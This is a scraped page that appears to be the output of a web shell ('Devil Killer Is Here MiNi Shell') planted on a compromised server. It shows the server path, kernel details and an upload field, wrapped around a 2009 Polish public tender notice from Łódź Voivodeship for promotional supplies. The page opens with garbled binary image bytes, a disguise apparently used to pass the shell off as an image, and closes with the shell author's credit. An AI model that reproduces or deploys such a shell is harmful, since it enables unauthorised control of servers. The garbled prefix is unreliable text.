JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/135654-N-2009.html

<p class="kh_header"><b>Łódź: Dostawa materiałów promocyjnych biurowych i pozostałych na potrzeby Województwa Łódzkiego</b><br>
<b>Numer ogłoszenia: 135654 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo  Łódzkie , al. Piłsudskiego 8, 90-051 Łódź, woj. łódzkie, tel. 042 6633385, 6633384, faks 042 6633391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjnych biurowych i pozostałych na potrzeby Województwa Łódzkiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów promocyjnych biurowych oraz materiałów promocyjnych pozostałych na potrzeby Województwa Łódzkiego w ramach kampanii informacyjno-promocyjnej Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.
2. Zakres zamówienia obejmuje:
- wykonanie projektu materiału promocyjnego (załączone wzory mają charakter jedynie pomocniczy);
- wykonanie przedmiotu zamówienia;
- umiejscowienie projektów graficznych logo oraz innych oznaczeń na zamawianych artykułach promocyjnych.
3. Oferowane materiały muszą być zgodne ze szczegółowym opisem przedmiotu zamówienia, który stanowi Załącznik Nr 7 do SIWZ.
4. Zamawiający wymaga aby dostarczane materiały były oznaczone w sposób wskazany dla każdego rodzaju materiałów promocyjnych.
5. Projekty graficzne logotypów, jakie powinny zostać umieszczone na dostarczonych materiałach, Zamawiający przekaże Wykonawcy w dniu podpisania umowy w postaci pliku elektronicznego oraz wydruku papierowego. 
6. Wszystkie zaoferowane towary muszą być pierwszego gatunku, fabrycznie nowe i wolne od wad oraz spełniać warunki określone dla produktów bezpiecznych w rozumieniu art. 4 ustawy z dnia 12 grudnia 2003r. o ogólnym bezpieczeństwie produktów (Dz.U. Nr 229, poz. 2275 z późn. zm.). Oferowane wyroby muszą ściśle odpowiadać cechom i parametrom określonym w Załączniku Nr 7 do SIWZ, posiadać określone przez Zamawiającego właściwości użytkowe i przyjęte standardy jakości. 
7. Wszystkie zaoferowane materiały i materiały (np. farby) użyte do ich znakowania oraz użyte podczas procesu produkcji i znakowania oraz technika użyta do produkcji finalnego wyrobu, który z racji swej funkcji ma kontakt z żywnością winny być nie toksyczne, posiadać atesty zezwalające na kontakt z żywnością oraz być zgodne z ustawą o materiałach i wyrobach przeznaczonych do kontaktu z żywnością z dnia 6 września 2001 r. (Dz.U. Nr 128, poz. 1408 z późn. zm) oraz ustawą o zmianie ustawy o materiałach i wyrobach przeznaczonych do kontaktu z żywnością z dnia 27 sierpnia 2003 r. (Dz.U. Nr 171, poz. 1662 z późn. zm.).
8. Wszystkie towary muszą posiadać oryginalne opakowania producenta, opatrzone w etykiety identyfikujące dany produkt. Materiały, w stosunku do których istnieje obowiązek posiadania certyfikatu na znak B lub deklaracji producenta / Wykonawcy na zgodność z PN - mają być odpowiednio w nie zaopatrzone.
9. Wykonawca w cenie oferty musi uwzględnić koszt transportu oraz rozładunku dostarczonych materiałów.
10. Na materiały, dla których producent określa termin gwarancji, Wykonawca zobowiązany jest udzielić takiego samego terminu gwarancji liczonego od daty dostawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 19.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1 -posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2 -posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
a) na potwierdzenie posiadania niezbędnego doświadczenia w zakresie Zadania Nr 1, Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie - wykonał (zakończył) dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia tj. polegające na dostawach materiałów promocyjnych obejmujących dostawy notesów, teczek papierowych, długopisów metalowych, w ramach jednego lub dwóch zamówień obejmujących wszystkie wymienione artykuły o łącznej wartości nie mniejszej niż 25 000,00 zł brutto oraz że dostawy te zostały wykonane należycie,
b) na potwierdzenie posiadania niezbędnego doświadczenia w zakresie Zadania Nr 2, Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie - wykonał (zakończył) dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia tj. polegające na dostawach materiałów promocyjnych obejmujących dostawy metalowych smyczy reklamowych, breloczków, gwizdków, balonów, parasoli automatycznych, małych flag reklamowych, toreb papierowych, magnesów reklamowych w ramach jednego, dwóch lub trzech zamówień obejmujących wszystkie wymienione artykuły o łącznej wartości nie mniejszej niż 55 000,00 zł brutto oraz że dostawy te zostały wykonane należycie.
3 - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4 - nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie przepisów art. 24 ustawy Pzp.

Ocena spełniania ww. warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez wykonawcę oświadczeń lub dokumentów. Dokumenty będą oceniane w trybie spełnia - nie spełnia, czyli: nie spełnia warunku - za brak dokumentu, spełnia warunek - za przedstawienie ważnego dokumentu lub kompletu dokumentów (w przypadku wykonawców wspólnie ubiegających się o zamówienie). Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, Zamawiający wymaga dołączenia do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
a) aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) oświadczenia Wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Pzp według Załącznika do SIWZ Nr 3,
c) oświadczenia Wykonawcy o niepodleganiu wykluczeniu z postępowania według Załącznika do SIWZ Nr 4.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie, Zamawiający żąda w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
a) Wykazu wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie dostaw odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, według Załącznika Nr 5 do SIWZ, odrębnie dla każdego Zadania.
b) Dokumentów potwierdzających, że w/w dostawy zostały wykonane należycie (np. referencje)
3. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dokumenty składa zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. 2006 r. Nr 87, poz. 605 ze zm.).
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:
a) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
b) formularz stanowiący Załącznik do SIWZ Nr 3 (Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 Ustawy) podpisuje pełnomocnik, (uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania);
c) formularz stanowiący Załącznik do SIWZ Nr 4 (Oświadczenie o nie podleganiu wykluczeniu z postępowania) każdy z Wykonawców podpisuje oddzielnie;
d) wykaz wykonanych dostaw, stanowiący Załącznik Nr 5 do SIWZ, Wykonawcy ubiegający się wspólnie o udzielenie zamówienia składają łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lodzkie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jak w pkt I.1. pokój nr 407.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 11:00, miejsce: Urząd Marszałkowski w Łodzi, al. Piłsudskiego 8, 90-051 Łódź piętro IV, pok. 403 Biuro Podawcze (Kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Pomocy Technicznej RPO WŁ.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa biurowych materiałów promocyjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów promocyjnych biurowych na potrzeby Województwa Łódzkiego w ramach kampanii informacyjno-promocyjnej Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.

2. Zakres zamówienia obejmuje:
- wykonanie projektu materiału promocyjnego (załączone wzory mają charakter jedynie pomocniczy);
- wykonanie przedmiotu zamówienia;
- umiejscowienie projektów graficznych logo oraz innych oznaczeń na zamawianych artykułach promocyjnych.

3. Wykonawca dostarczy materiały promocyjne zgodnie z podanymi niżej ilościami:
- Notesy - 4000 szt.;
- Teczki papierowe - 2000 szt.;
- Długopisy metalowe - 4500 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów promocyjnych pozostałych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów promocyjnych pozostałych na potrzeby Województwa Łódzkiego w ramach kampanii informacyjno-promocyjnej Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.

2. Zakres zamówienia obejmuje:
- wykonanie projektu materiału promocyjnego (załączone wzory mają charakter jedynie pomocniczy);
- wykonanie przedmiotu zamówienia;
- umiejscowienie projektów graficznych logo oraz innych oznaczeń na zamawianych artykułach promocyjnych.

3. Wykonawca dostarczy materiały promocyjne zgodnie z podanymi niżej ilościami:
- Smycze reklamowe - 500 szt.;
- Breloczki - 1000 szt.;
- Gwizdki - 500 szt;
- Balony - 5000 szt;
- Parasole automatyczne - 500 szt;
- Małe flagi reklamowe (flagietki) - 5000 szt;
- Torby papierowe- 1000 szt;
- Magnes reklamowy - 14000 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com